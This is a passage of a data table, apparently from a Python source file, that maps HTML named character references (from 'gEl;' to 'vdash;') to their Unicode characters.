"gEl;": "\u2a8c",
"gacute;": "\u01f5",
"gamma;": "\u03b3",
"gammad;": "\u03dd",
"gap;": "\u2a86",
"gbreve;": "\u011f",
"gcirc;": "\u011d",
"gcy;": "\u0433",
"gdot;": "\u0121",
"ge;": "\u2265",
"gel;": "\u22db",
"geq;": "\u2265",
"geqq;": "\u2267",
"geqslant;": "\u2a7e",
"ges;": "\u2a7e",
"gescc;": "\u2aa9",
"gesdot;": "\u2a80",
"gesdoto;": "\u2a82",
"gesdotol;": "\u2a84",
"gesl;": "\u22db\ufe00",
"gesles;": "\u2a94",
"gfr;": "\U0001d524",
"gg;": "\u226b",
"ggg;": "\u22d9",
"gimel;": "\u2137",
"gjcy;": "\u0453",
"gl;": "\u2277",
"glE;": "\u2a92",
"gla;": "\u2aa5",
"glj;": "\u2aa4",
"gnE;": "\u2269",
"gnap;": "\u2a8a",
"gnapprox;": "\u2a8a",
"gne;": "\u2a88",
"gneq;": "\u2a88",
"gneqq;": "\u2269",
"gnsim;": "\u22e7",
"gopf;": "\U0001d558",
"grave;": "`",
"gscr;": "\u210a",
"gsim;": "\u2273",
"gsime;": "\u2a8e",
"gsiml;": "\u2a90",
"gt": ">",
"gt;": ">",
"gtcc;": "\u2aa7",
"gtcir;": "\u2a7a",
"gtdot;": "\u22d7",
"gtlPar;": "\u2995",
"gtquest;": "\u2a7c",
"gtrapprox;": "\u2a86",
"gtrarr;": "\u2978",
"gtrdot;": "\u22d7",
"gtreqless;": "\u22db",
"gtreqqless;": "\u2a8c",
"gtrless;": "\u2277",
"gtrsim;": "\u2273",
"gvertneqq;": "\u2269\ufe00",
"gvnE;": "\u2269\ufe00",
"hArr;": "\u21d4",
"hairsp;": "\u200a",
"half;": "\xbd",
"hamilt;": "\u210b",
"hardcy;": "\u044a",
"harr;": "\u2194",
"harrcir;": "\u2948",
"harrw;": "\u21ad",
"hbar;": "\u210f",
"hcirc;": "\u0125",
"hearts;": "\u2665",
"heartsuit;": "\u2665",
"hellip;": "\u2026",
"hercon;": "\u22b9",
"hfr;": "\U0001d525",
"hksearow;": "\u2925",
"hkswarow;": "\u2926",
"hoarr;": "\u21ff",
"homtht;": "\u223b",
"hookleftarrow;": "\u21a9",
"hookrightarrow;": "\u21aa",
"hopf;": "\U0001d559",
"horbar;": "\u2015",
"hscr;": "\U0001d4bd",
"hslash;": "\u210f",
"hstrok;": "\u0127",
"hybull;": "\u2043",
"hyphen;": "\u2010",
"iacute": "\xed",
"iacute;": "\xed",
"ic;": "\u2063",
"icirc": "\xee",
"icirc;": "\xee",
"icy;": "\u0438",
"iecy;": "\u0435",
"iexcl": "\xa1",
"iexcl;": "\xa1",
"iff;": "\u21d4",
"ifr;": "\U0001d526",
"igrave": "\xec",
"igrave;": "\xec",
"ii;": "\u2148",
"iiiint;": "\u2a0c",
"iiint;": "\u222d",
"iinfin;": "\u29dc",
"iiota;": "\u2129",
"ijlig;": "\u0133",
"imacr;": "\u012b",
"image;": "\u2111",
"imagline;": "\u2110",
"imagpart;": "\u2111",
"imath;": "\u0131",
"imof;": "\u22b7",
"imped;": "\u01b5",
"in;": "\u2208",
"incare;": "\u2105",
"infin;": "\u221e",
"infintie;": "\u29dd",
"inodot;": "\u0131",
"int;": "\u222b",
"intcal;": "\u22ba",
"integers;": "\u2124",
"intercal;": "\u22ba",
"intlarhk;": "\u2a17",
"intprod;": "\u2a3c",
"iocy;": "\u0451",
"iogon;": "\u012f",
"iopf;": "\U0001d55a",
"iota;": "\u03b9",
"iprod;": "\u2a3c",
"iquest": "\xbf",
"iquest;": "\xbf",
"iscr;": "\U0001d4be",
"isin;": "\u2208",
"isinE;": "\u22f9",
"isindot;": "\u22f5",
"isins;": "\u22f4",
"isinsv;": "\u22f3",
"isinv;": "\u2208",
"it;": "\u2062",
"itilde;": "\u0129",
"iukcy;": "\u0456",
"iuml": "\xef",
"iuml;": "\xef",
"jcirc;": "\u0135",
"jcy;": "\u0439",
"jfr;": "\U0001d527",
"jmath;": "\u0237",
"jopf;": "\U0001d55b",
"jscr;": "\U0001d4bf",
"jsercy;": "\u0458",
"jukcy;": "\u0454",
"kappa;": "\u03ba",
"kappav;": "\u03f0",
"kcedil;": "\u0137",
"kcy;": "\u043a",
"kfr;": "\U0001d528",
"kgreen;": "\u0138",
"khcy;": "\u0445",
"kjcy;": "\u045c",
"kopf;": "\U0001d55c",
"kscr;": "\U0001d4c0",
"lAarr;": "\u21da",
"lArr;": "\u21d0",
"lAtail;": "\u291b",
"lBarr;": "\u290e",
"lE;": "\u2266",
"lEg;": "\u2a8b",
"lHar;": "\u2962",
"lacute;": "\u013a",
"laemptyv;": "\u29b4",
"lagran;": "\u2112",
"lambda;": "\u03bb",
"lang;": "\u27e8",
"langd;": "\u2991",
"langle;": "\u27e8",
"lap;": "\u2a85",
"laquo": "\xab",
"laquo;": "\xab",
"larr;": "\u2190",
"larrb;": "\u21e4",
"larrbfs;": "\u291f",
"larrfs;": "\u291d",
"larrhk;": "\u21a9",
"larrlp;": "\u21ab",
"larrpl;": "\u2939",
"larrsim;": "\u2973",
"larrtl;": "\u21a2",
"lat;": "\u2aab",
"latail;": "\u2919",
"late;": "\u2aad",
"lates;": "\u2aad\ufe00",
"lbarr;": "\u290c",
"lbbrk;": "\u2772",
"lbrace;": "{",
"lbrack;": "[",
"lbrke;": "\u298b",
"lbrksld;": "\u298f",
"lbrkslu;": "\u298d",
"lcaron;": "\u013e",
"lcedil;": "\u013c",
"lceil;": "\u2308",
"lcub;": "{",
"lcy;": "\u043b",
"ldca;": "\u2936",
"ldquo;": "\u201c",
"ldquor;": "\u201e",
"ldrdhar;": "\u2967",
"ldrushar;": "\u294b",
"ldsh;": "\u21b2",
"le;": "\u2264",
"leftarrow;": "\u2190",
"leftarrowtail;": "\u21a2",
"leftharpoondown;": "\u21bd",
"leftharpoonup;": "\u21bc",
"leftleftarrows;": "\u21c7",
"leftrightarrow;": "\u2194",
"leftrightarrows;": "\u21c6",
"leftrightharpoons;": "\u21cb",
"leftrightsquigarrow;": "\u21ad",
"leftthreetimes;": "\u22cb",
"leg;": "\u22da",
"leq;": "\u2264",
"leqq;": "\u2266",
"leqslant;": "\u2a7d",
"les;": "\u2a7d",
"lescc;": "\u2aa8",
"lesdot;": "\u2a7f",
"lesdoto;": "\u2a81",
"lesdotor;": "\u2a83",
"lesg;": "\u22da\ufe00",
"lesges;": "\u2a93",
"lessapprox;": "\u2a85",
"lessdot;": "\u22d6",
"lesseqgtr;": "\u22da",
"lesseqqgtr;": "\u2a8b",
"lessgtr;": "\u2276",
"lesssim;": "\u2272",
"lfisht;": "\u297c",
"lfloor;": "\u230a",
"lfr;": "\U0001d529",
"lg;": "\u2276",
"lgE;": "\u2a91",
"lhard;": "\u21bd",
"lharu;": "\u21bc",
"lharul;": "\u296a",
"lhblk;": "\u2584",
"ljcy;": "\u0459",
"ll;": "\u226a",
"llarr;": "\u21c7",
"llcorner;": "\u231e",
"llhard;": "\u296b",
"lltri;": "\u25fa",
"lmidot;": "\u0140",
"lmoust;": "\u23b0",
"lmoustache;": "\u23b0",
"lnE;": "\u2268",
"lnap;": "\u2a89",
"lnapprox;": "\u2a89",
"lne;": "\u2a87",
"lneq;": "\u2a87",
"lneqq;": "\u2268",
"lnsim;": "\u22e6",
"loang;": "\u27ec",
"loarr;": "\u21fd",
"lobrk;": "\u27e6",
"longleftarrow;": "\u27f5",
"longleftrightarrow;": "\u27f7",
"longmapsto;": "\u27fc",
"longrightarrow;": "\u27f6",
"looparrowleft;": "\u21ab",
"looparrowright;": "\u21ac",
"lopar;": "\u2985",
"lopf;": "\U0001d55d",
"loplus;": "\u2a2d",
"lotimes;": "\u2a34",
"lowast;": "\u2217",
"lowbar;": "_",
"loz;": "\u25ca",
"lozenge;": "\u25ca",
"lozf;": "\u29eb",
"lpar;": "(",
"lparlt;": "\u2993",
"lrarr;": "\u21c6",
"lrcorner;": "\u231f",
"lrhar;": "\u21cb",
"lrhard;": "\u296d",
"lrm;": "\u200e",
"lrtri;": "\u22bf",
"lsaquo;": "\u2039",
"lscr;": "\U0001d4c1",
"lsh;": "\u21b0",
"lsim;": "\u2272",
"lsime;": "\u2a8d",
"lsimg;": "\u2a8f",
"lsqb;": "[",
"lsquo;": "\u2018",
"lsquor;": "\u201a",
"lstrok;": "\u0142",
"lt": "<",
"lt;": "<",
"ltcc;": "\u2aa6",
"ltcir;": "\u2a79",
"ltdot;": "\u22d6",
"lthree;": "\u22cb",
"ltimes;": "\u22c9",
"ltlarr;": "\u2976",
"ltquest;": "\u2a7b",
"ltrPar;": "\u2996",
"ltri;": "\u25c3",
"ltrie;": "\u22b4",
"ltrif;": "\u25c2",
"lurdshar;": "\u294a",
"luruhar;": "\u2966",
"lvertneqq;": "\u2268\ufe00",
"lvnE;": "\u2268\ufe00",
"mDDot;": "\u223a",
"macr": "\xaf",
"macr;": "\xaf",
"male;": "\u2642",
"malt;": "\u2720",
"maltese;": "\u2720",
"map;": "\u21a6",
"mapsto;": "\u21a6",
"mapstodown;": "\u21a7",
"mapstoleft;": "\u21a4",
"mapstoup;": "\u21a5",
"marker;": "\u25ae",
"mcomma;": "\u2a29",
"mcy;": "\u043c",
"mdash;": "\u2014",
"measuredangle;": "\u2221",
"mfr;": "\U0001d52a",
"mho;": "\u2127",
"micro": "\xb5",
"micro;": "\xb5",
"mid;": "\u2223",
"midast;": "*",
"midcir;": "\u2af0",
"middot": "\xb7",
"middot;": "\xb7",
"minus;": "\u2212",
"minusb;": "\u229f",
"minusd;": "\u2238",
"minusdu;": "\u2a2a",
"mlcp;": "\u2adb",
"mldr;": "\u2026",
"mnplus;": "\u2213",
"models;": "\u22a7",
"mopf;": "\U0001d55e",
"mp;": "\u2213",
"mscr;": "\U0001d4c2",
"mstpos;": "\u223e",
"mu;": "\u03bc",
"multimap;": "\u22b8",
"mumap;": "\u22b8",
"nGg;": "\u22d9\u0338",
"nGt;": "\u226b\u20d2",
"nGtv;": "\u226b\u0338",
"nLeftarrow;": "\u21cd",
"nLeftrightarrow;": "\u21ce",
"nLl;": "\u22d8\u0338",
"nLt;": "\u226a\u20d2",
"nLtv;": "\u226a\u0338",
"nRightarrow;": "\u21cf",
"nVDash;": "\u22af",
"nVdash;": "\u22ae",
"nabla;": "\u2207",
"nacute;": "\u0144",
"nang;": "\u2220\u20d2",
"nap;": "\u2249",
"napE;": "\u2a70\u0338",
"napid;": "\u224b\u0338",
"napos;": "\u0149",
"napprox;": "\u2249",
"natur;": "\u266e",
"natural;": "\u266e",
"naturals;": "\u2115",
"nbsp": "\xa0",
"nbsp;": "\xa0",
"nbump;": "\u224e\u0338",
"nbumpe;": "\u224f\u0338",
"ncap;": "\u2a43",
"ncaron;": "\u0148",
"ncedil;": "\u0146",
"ncong;": "\u2247",
"ncongdot;": "\u2a6d\u0338",
"ncup;": "\u2a42",
"ncy;": "\u043d",
"ndash;": "\u2013",
"ne;": "\u2260",
"neArr;": "\u21d7",
"nearhk;": "\u2924",
"nearr;": "\u2197",
"nearrow;": "\u2197",
"nedot;": "\u2250\u0338",
"nequiv;": "\u2262",
"nesear;": "\u2928",
"nesim;": "\u2242\u0338",
"nexist;": "\u2204",
"nexists;": "\u2204",
"nfr;": "\U0001d52b",
"ngE;": "\u2267\u0338",
"nge;": "\u2271",
"ngeq;": "\u2271",
"ngeqq;": "\u2267\u0338",
"ngeqslant;": "\u2a7e\u0338",
"nges;": "\u2a7e\u0338",
"ngsim;": "\u2275",
"ngt;": "\u226f",
"ngtr;": "\u226f",
"nhArr;": "\u21ce",
"nharr;": "\u21ae",
"nhpar;": "\u2af2",
"ni;": "\u220b",
"nis;": "\u22fc",
"nisd;": "\u22fa",
"niv;": "\u220b",
"njcy;": "\u045a",
"nlArr;": "\u21cd",
"nlE;": "\u2266\u0338",
"nlarr;": "\u219a",
"nldr;": "\u2025",
"nle;": "\u2270",
"nleftarrow;": "\u219a",
"nleftrightarrow;": "\u21ae",
"nleq;": "\u2270",
"nleqq;": "\u2266\u0338",
"nleqslant;": "\u2a7d\u0338",
"nles;": "\u2a7d\u0338",
"nless;": "\u226e",
"nlsim;": "\u2274",
"nlt;": "\u226e",
"nltri;": "\u22ea",
"nltrie;": "\u22ec",
"nmid;": "\u2224",
"nopf;": "\U0001d55f",
"not": "\xac",
"not;": "\xac",
"notin;": "\u2209",
"notinE;": "\u22f9\u0338",
"notindot;": "\u22f5\u0338",
"notinva;": "\u2209",
"notinvb;": "\u22f7",
"notinvc;": "\u22f6",
"notni;": "\u220c",
"notniva;": "\u220c",
"notnivb;": "\u22fe",
"notnivc;": "\u22fd",
"npar;": "\u2226",
"nparallel;": "\u2226",
"nparsl;": "\u2afd\u20e5",
"npart;": "\u2202\u0338",
"npolint;": "\u2a14",
"npr;": "\u2280",
"nprcue;": "\u22e0",
"npre;": "\u2aaf\u0338",
"nprec;": "\u2280",
"npreceq;": "\u2aaf\u0338",
"nrArr;": "\u21cf",
"nrarr;": "\u219b",
"nrarrc;": "\u2933\u0338",
"nrarrw;": "\u219d\u0338",
"nrightarrow;": "\u219b",
"nrtri;": "\u22eb",
"nrtrie;": "\u22ed",
"nsc;": "\u2281",
"nsccue;": "\u22e1",
"nsce;": "\u2ab0\u0338",
"nscr;": "\U0001d4c3",
"nshortmid;": "\u2224",
"nshortparallel;": "\u2226",
"nsim;": "\u2241",
"nsime;": "\u2244",
"nsimeq;": "\u2244",
"nsmid;": "\u2224",
"nspar;": "\u2226",
"nsqsube;": "\u22e2",
"nsqsupe;": "\u22e3",
"nsub;": "\u2284",
"nsubE;": "\u2ac5\u0338",
"nsube;": "\u2288",
"nsubset;": "\u2282\u20d2",
"nsubseteq;": "\u2288",
"nsubseteqq;": "\u2ac5\u0338",
"nsucc;": "\u2281",
"nsucceq;": "\u2ab0\u0338",
"nsup;": "\u2285",
"nsupE;": "\u2ac6\u0338",
"nsupe;": "\u2289",
"nsupset;": "\u2283\u20d2",
"nsupseteq;": "\u2289",
"nsupseteqq;": "\u2ac6\u0338",
"ntgl;": "\u2279",
"ntilde": "\xf1",
"ntilde;": "\xf1",
"ntlg;": "\u2278",
"ntriangleleft;": "\u22ea",
"ntrianglelefteq;": "\u22ec",
"ntriangleright;": "\u22eb",
"ntrianglerighteq;": "\u22ed",
"nu;": "\u03bd",
"num;": "#",
"numero;": "\u2116",
"numsp;": "\u2007",
"nvDash;": "\u22ad",
"nvHarr;": "\u2904",
"nvap;": "\u224d\u20d2",
"nvdash;": "\u22ac",
"nvge;": "\u2265\u20d2",
"nvgt;": ">\u20d2",
"nvinfin;": "\u29de",
"nvlArr;": "\u2902",
"nvle;": "\u2264\u20d2",
"nvlt;": "<\u20d2",
"nvltrie;": "\u22b4\u20d2",
"nvrArr;": "\u2903",
"nvrtrie;": "\u22b5\u20d2",
"nvsim;": "\u223c\u20d2",
"nwArr;": "\u21d6",
"nwarhk;": "\u2923",
"nwarr;": "\u2196",
"nwarrow;": "\u2196",
"nwnear;": "\u2927",
"oS;": "\u24c8",
"oacute": "\xf3",
"oacute;": "\xf3",
"oast;": "\u229b",
"ocir;": "\u229a",
"ocirc": "\xf4",
"ocirc;": "\xf4",
"ocy;": "\u043e",
"odash;": "\u229d",
"odblac;": "\u0151",
"odiv;": "\u2a38",
"odot;": "\u2299",
"odsold;": "\u29bc",
"oelig;": "\u0153",
"ofcir;": "\u29bf",
"ofr;": "\U0001d52c",
"ogon;": "\u02db",
"ograve": "\xf2",
"ograve;": "\xf2",
"ogt;": "\u29c1",
"ohbar;": "\u29b5",
"ohm;": "\u03a9",
"oint;": "\u222e",
"olarr;": "\u21ba",
"olcir;": "\u29be",
"olcross;": "\u29bb",
"oline;": "\u203e",
"olt;": "\u29c0",
"omacr;": "\u014d",
"omega;": "\u03c9",
"omicron;": "\u03bf",
"omid;": "\u29b6",
"ominus;": "\u2296",
"oopf;": "\U0001d560",
"opar;": "\u29b7",
"operp;": "\u29b9",
"oplus;": "\u2295",
"or;": "\u2228",
"orarr;": "\u21bb",
"ord;": "\u2a5d",
"order;": "\u2134",
"orderof;": "\u2134",
"ordf": "\xaa",
"ordf;": "\xaa",
"ordm": "\xba",
"ordm;": "\xba",
"origof;": "\u22b6",
"oror;": "\u2a56",
"orslope;": "\u2a57",
"orv;": "\u2a5b",
"oscr;": "\u2134",
"oslash": "\xf8",
"oslash;": "\xf8",
"osol;": "\u2298",
"otilde": "\xf5",
"otilde;": "\xf5",
"otimes;": "\u2297",
"otimesas;": "\u2a36",
"ouml": "\xf6",
"ouml;": "\xf6",
"ovbar;": "\u233d",
"par;": "\u2225",
"para": "\xb6",
"para;": "\xb6",
"parallel;": "\u2225",
"parsim;": "\u2af3",
"parsl;": "\u2afd",
"part;": "\u2202",
"pcy;": "\u043f",
"percnt;": "%",
"period;": ".",
"permil;": "\u2030",
"perp;": "\u22a5",
"pertenk;": "\u2031",
"pfr;": "\U0001d52d",
"phi;": "\u03c6",
"phiv;": "\u03d5",
"phmmat;": "\u2133",
"phone;": "\u260e",
"pi;": "\u03c0",
"pitchfork;": "\u22d4",
"piv;": "\u03d6",
"planck;": "\u210f",
"planckh;": "\u210e",
"plankv;": "\u210f",
"plus;": "+",
"plusacir;": "\u2a23",
"plusb;": "\u229e",
"pluscir;": "\u2a22",
"plusdo;": "\u2214",
"plusdu;": "\u2a25",
"pluse;": "\u2a72",
"plusmn": "\xb1",
"plusmn;": "\xb1",
"plussim;": "\u2a26",
"plustwo;": "\u2a27",
"pm;": "\xb1",
"pointint;": "\u2a15",
"popf;": "\U0001d561",
"pound": "\xa3",
"pound;": "\xa3",
"pr;": "\u227a",
"prE;": "\u2ab3",
"prap;": "\u2ab7",
"prcue;": "\u227c",
"pre;": "\u2aaf",
"prec;": "\u227a",
"precapprox;": "\u2ab7",
"preccurlyeq;": "\u227c",
"preceq;": "\u2aaf",
"precnapprox;": "\u2ab9",
"precneqq;": "\u2ab5",
"precnsim;": "\u22e8",
"precsim;": "\u227e",
"prime;": "\u2032",
"primes;": "\u2119",
"prnE;": "\u2ab5",
"prnap;": "\u2ab9",
"prnsim;": "\u22e8",
"prod;": "\u220f",
"profalar;": "\u232e",
"profline;": "\u2312",
"profsurf;": "\u2313",
"prop;": "\u221d",
"propto;": "\u221d",
"prsim;": "\u227e",
"prurel;": "\u22b0",
"pscr;": "\U0001d4c5",
"psi;": "\u03c8",
"puncsp;": "\u2008",
"qfr;": "\U0001d52e",
"qint;": "\u2a0c",
"qopf;": "\U0001d562",
"qprime;": "\u2057",
"qscr;": "\U0001d4c6",
"quaternions;": "\u210d",
"quatint;": "\u2a16",
"quest;": "?",
"questeq;": "\u225f",
"quot": "\"",
"quot;": "\"",
"rAarr;": "\u21db",
"rArr;": "\u21d2",
"rAtail;": "\u291c",
"rBarr;": "\u290f",
"rHar;": "\u2964",
"race;": "\u223d\u0331",
"racute;": "\u0155",
"radic;": "\u221a",
"raemptyv;": "\u29b3",
"rang;": "\u27e9",
"rangd;": "\u2992",
"range;": "\u29a5",
"rangle;": "\u27e9",
"raquo": "\xbb",
"raquo;": "\xbb",
"rarr;": "\u2192",
"rarrap;": "\u2975",
"rarrb;": "\u21e5",
"rarrbfs;": "\u2920",
"rarrc;": "\u2933",
"rarrfs;": "\u291e",
"rarrhk;": "\u21aa",
"rarrlp;": "\u21ac",
"rarrpl;": "\u2945",
"rarrsim;": "\u2974",
"rarrtl;": "\u21a3",
"rarrw;": "\u219d",
"ratail;": "\u291a",
"ratio;": "\u2236",
"rationals;": "\u211a",
"rbarr;": "\u290d",
"rbbrk;": "\u2773",
"rbrace;": "}",
"rbrack;": "]",
"rbrke;": "\u298c",
"rbrksld;": "\u298e",
"rbrkslu;": "\u2990",
"rcaron;": "\u0159",
"rcedil;": "\u0157",
"rceil;": "\u2309",
"rcub;": "}",
"rcy;": "\u0440",
"rdca;": "\u2937",
"rdldhar;": "\u2969",
"rdquo;": "\u201d",
"rdquor;": "\u201d",
"rdsh;": "\u21b3",
"real;": "\u211c",
"realine;": "\u211b",
"realpart;": "\u211c",
"reals;": "\u211d",
"rect;": "\u25ad",
"reg": "\xae",
"reg;": "\xae",
"rfisht;": "\u297d",
"rfloor;": "\u230b",
"rfr;": "\U0001d52f",
"rhard;": "\u21c1",
"rharu;": "\u21c0",
"rharul;": "\u296c",
"rho;": "\u03c1",
"rhov;": "\u03f1",
"rightarrow;": "\u2192",
"rightarrowtail;": "\u21a3",
"rightharpoondown;": "\u21c1",
"rightharpoonup;": "\u21c0",
"rightleftarrows;": "\u21c4",
"rightleftharpoons;": "\u21cc",
"rightrightarrows;": "\u21c9",
"rightsquigarrow;": "\u219d",
"rightthreetimes;": "\u22cc",
"ring;": "\u02da",
"risingdotseq;": "\u2253",
"rlarr;": "\u21c4",
"rlhar;": "\u21cc",
"rlm;": "\u200f",
"rmoust;": "\u23b1",
"rmoustache;": "\u23b1",
"rnmid;": "\u2aee",
"roang;": "\u27ed",
"roarr;": "\u21fe",
"robrk;": "\u27e7",
"ropar;": "\u2986",
"ropf;": "\U0001d563",
"roplus;": "\u2a2e",
"rotimes;": "\u2a35",
"rpar;": ")",
"rpargt;": "\u2994",
"rppolint;": "\u2a12",
"rrarr;": "\u21c9",
"rsaquo;": "\u203a",
"rscr;": "\U0001d4c7",
"rsh;": "\u21b1",
"rsqb;": "]",
"rsquo;": "\u2019",
"rsquor;": "\u2019",
"rthree;": "\u22cc",
"rtimes;": "\u22ca",
"rtri;": "\u25b9",
"rtrie;": "\u22b5",
"rtrif;": "\u25b8",
"rtriltri;": "\u29ce",
"ruluhar;": "\u2968",
"rx;": "\u211e",
"sacute;": "\u015b",
"sbquo;": "\u201a",
"sc;": "\u227b",
"scE;": "\u2ab4",
"scap;": "\u2ab8",
"scaron;": "\u0161",
"sccue;": "\u227d",
"sce;": "\u2ab0",
"scedil;": "\u015f",
"scirc;": "\u015d",
"scnE;": "\u2ab6",
"scnap;": "\u2aba",
"scnsim;": "\u22e9",
"scpolint;": "\u2a13",
"scsim;": "\u227f",
"scy;": "\u0441",
"sdot;": "\u22c5",
"sdotb;": "\u22a1",
"sdote;": "\u2a66",
"seArr;": "\u21d8",
"searhk;": "\u2925",
"searr;": "\u2198",
"searrow;": "\u2198",
"sect": "\xa7",
"sect;": "\xa7",
"semi;": ";",
"seswar;": "\u2929",
"setminus;": "\u2216",
"setmn;": "\u2216",
"sext;": "\u2736",
"sfr;": "\U0001d530",
"sfrown;": "\u2322",
"sharp;": "\u266f",
"shchcy;": "\u0449",
"shcy;": "\u0448",
"shortmid;": "\u2223",
"shortparallel;": "\u2225",
"shy": "\xad",
"shy;": "\xad",
"sigma;": "\u03c3",
"sigmaf;": "\u03c2",
"sigmav;": "\u03c2",
"sim;": "\u223c",
"simdot;": "\u2a6a",
"sime;": "\u2243",
"simeq;": "\u2243",
"simg;": "\u2a9e",
"simgE;": "\u2aa0",
"siml;": "\u2a9d",
"simlE;": "\u2a9f",
"simne;": "\u2246",
"simplus;": "\u2a24",
"simrarr;": "\u2972",
"slarr;": "\u2190",
"smallsetminus;": "\u2216",
"smashp;": "\u2a33",
"smeparsl;": "\u29e4",
"smid;": "\u2223",
"smile;": "\u2323",
"smt;": "\u2aaa",
"smte;": "\u2aac",
"smtes;": "\u2aac\ufe00",
"softcy;": "\u044c",
"sol;": "/",
"solb;": "\u29c4",
"solbar;": "\u233f",
"sopf;": "\U0001d564",
"spades;": "\u2660",
"spadesuit;": "\u2660",
"spar;": "\u2225",
"sqcap;": "\u2293",
"sqcaps;": "\u2293\ufe00",
"sqcup;": "\u2294",
"sqcups;": "\u2294\ufe00",
"sqsub;": "\u228f",
"sqsube;": "\u2291",
"sqsubset;": "\u228f",
"sqsubseteq;": "\u2291",
"sqsup;": "\u2290",
"sqsupe;": "\u2292",
"sqsupset;": "\u2290",
"sqsupseteq;": "\u2292",
"squ;": "\u25a1",
"square;": "\u25a1",
"squarf;": "\u25aa",
"squf;": "\u25aa",
"srarr;": "\u2192",
"sscr;": "\U0001d4c8",
"ssetmn;": "\u2216",
"ssmile;": "\u2323",
"sstarf;": "\u22c6",
"star;": "\u2606",
"starf;": "\u2605",
"straightepsilon;": "\u03f5",
"straightphi;": "\u03d5",
"strns;": "\xaf",
"sub;": "\u2282",
"subE;": "\u2ac5",
"subdot;": "\u2abd",
"sube;": "\u2286",
"subedot;": "\u2ac3",
"submult;": "\u2ac1",
"subnE;": "\u2acb",
"subne;": "\u228a",
"subplus;": "\u2abf",
"subrarr;": "\u2979",
"subset;": "\u2282",
"subseteq;": "\u2286",
"subseteqq;": "\u2ac5",
"subsetneq;": "\u228a",
"subsetneqq;": "\u2acb",
"subsim;": "\u2ac7",
"subsub;": "\u2ad5",
"subsup;": "\u2ad3",
"succ;": "\u227b",
"succapprox;": "\u2ab8",
"succcurlyeq;": "\u227d",
"succeq;": "\u2ab0",
"succnapprox;": "\u2aba",
"succneqq;": "\u2ab6",
"succnsim;": "\u22e9",
"succsim;": "\u227f",
"sum;": "\u2211",
"sung;": "\u266a",
"sup1": "\xb9",
"sup1;": "\xb9",
"sup2": "\xb2",
"sup2;": "\xb2",
"sup3": "\xb3",
"sup3;": "\xb3",
"sup;": "\u2283",
"supE;": "\u2ac6",
"supdot;": "\u2abe",
"supdsub;": "\u2ad8",
"supe;": "\u2287",
"supedot;": "\u2ac4",
"suphsol;": "\u27c9",
"suphsub;": "\u2ad7",
"suplarr;": "\u297b",
"supmult;": "\u2ac2",
"supnE;": "\u2acc",
"supne;": "\u228b",
"supplus;": "\u2ac0",
"supset;": "\u2283",
"supseteq;": "\u2287",
"supseteqq;": "\u2ac6",
"supsetneq;": "\u228b",
"supsetneqq;": "\u2acc",
"supsim;": "\u2ac8",
"supsub;": "\u2ad4",
"supsup;": "\u2ad6",
"swArr;": "\u21d9",
"swarhk;": "\u2926",
"swarr;": "\u2199",
"swarrow;": "\u2199",
"swnwar;": "\u292a",
"szlig": "\xdf",
"szlig;": "\xdf",
"target;": "\u2316",
"tau;": "\u03c4",
"tbrk;": "\u23b4",
"tcaron;": "\u0165",
"tcedil;": "\u0163",
"tcy;": "\u0442",
"tdot;": "\u20db",
"telrec;": "\u2315",
"tfr;": "\U0001d531",
"there4;": "\u2234",
"therefore;": "\u2234",
"theta;": "\u03b8",
"thetasym;": "\u03d1",
"thetav;": "\u03d1",
"thickapprox;": "\u2248",
"thicksim;": "\u223c",
"thinsp;": "\u2009",
"thkap;": "\u2248",
"thksim;": "\u223c",
"thorn": "\xfe",
"thorn;": "\xfe",
"tilde;": "\u02dc",
"times": "\xd7",
"times;": "\xd7",
"timesb;": "\u22a0",
"timesbar;": "\u2a31",
"timesd;": "\u2a30",
"tint;": "\u222d",
"toea;": "\u2928",
"top;": "\u22a4",
"topbot;": "\u2336",
"topcir;": "\u2af1",
"topf;": "\U0001d565",
"topfork;": "\u2ada",
"tosa;": "\u2929",
"tprime;": "\u2034",
"trade;": "\u2122",
"triangle;": "\u25b5",
"triangledown;": "\u25bf",
"triangleleft;": "\u25c3",
"trianglelefteq;": "\u22b4",
"triangleq;": "\u225c",
"triangleright;": "\u25b9",
"trianglerighteq;": "\u22b5",
"tridot;": "\u25ec",
"trie;": "\u225c",
"triminus;": "\u2a3a",
"triplus;": "\u2a39",
"trisb;": "\u29cd",
"tritime;": "\u2a3b",
"trpezium;": "\u23e2",
"tscr;": "\U0001d4c9",
"tscy;": "\u0446",
"tshcy;": "\u045b",
"tstrok;": "\u0167",
"twixt;": "\u226c",
"twoheadleftarrow;": "\u219e",
"twoheadrightarrow;": "\u21a0",
"uArr;": "\u21d1",
"uHar;": "\u2963",
"uacute": "\xfa",
"uacute;": "\xfa",
"uarr;": "\u2191",
"ubrcy;": "\u045e",
"ubreve;": "\u016d",
"ucirc": "\xfb",
"ucirc;": "\xfb",
"ucy;": "\u0443",
"udarr;": "\u21c5",
"udblac;": "\u0171",
"udhar;": "\u296e",
"ufisht;": "\u297e",
"ufr;": "\U0001d532",
"ugrave": "\xf9",
"ugrave;": "\xf9",
"uharl;": "\u21bf",
"uharr;": "\u21be",
"uhblk;": "\u2580",
"ulcorn;": "\u231c",
"ulcorner;": "\u231c",
"ulcrop;": "\u230f",
"ultri;": "\u25f8",
"umacr;": "\u016b",
"uml": "\xa8",
"uml;": "\xa8",
"uogon;": "\u0173",
"uopf;": "\U0001d566",
"uparrow;": "\u2191",
"updownarrow;": "\u2195",
"upharpoonleft;": "\u21bf",
"upharpoonright;": "\u21be",
"uplus;": "\u228e",
"upsi;": "\u03c5",
"upsih;": "\u03d2",
"upsilon;": "\u03c5",
"upuparrows;": "\u21c8",
"urcorn;": "\u231d",
"urcorner;": "\u231d",
"urcrop;": "\u230e",
"uring;": "\u016f",
"urtri;": "\u25f9",
"uscr;": "\U0001d4ca",
"utdot;": "\u22f0",
"utilde;": "\u0169",
"utri;": "\u25b5",
"utrif;": "\u25b4",
"uuarr;": "\u21c8",
"uuml": "\xfc",
"uuml;": "\xfc",
"uwangle;": "\u29a7",
"vArr;": "\u21d5",
"vBar;": "\u2ae8",
"vBarv;": "\u2ae9",
"vDash;": "\u22a8",
"vangrt;": "\u299c",
"varepsilon;": "\u03f5",
"varkappa;": "\u03f0",
"varnothing;": "\u2205",
"varphi;": "\u03d5",
"varpi;": "\u03d6",
"varpropto;": "\u221d",
"varr;": "\u2195",
"varrho;": "\u03f1",
"varsigma;": "\u03c2",
"varsubsetneq;": "\u228a\ufe00",
"varsubsetneqq;": "\u2acb\ufe00",
"varsupsetneq;": "\u228b\ufe00",
"varsupsetneqq;": "\u2acc\ufe00",
"vartheta;": "\u03d1",
"vartriangleleft;": "\u22b2",
"vartriangleright;": "\u22b3",
"vcy;": "\u0432",
"vdash;": "\u22a2",
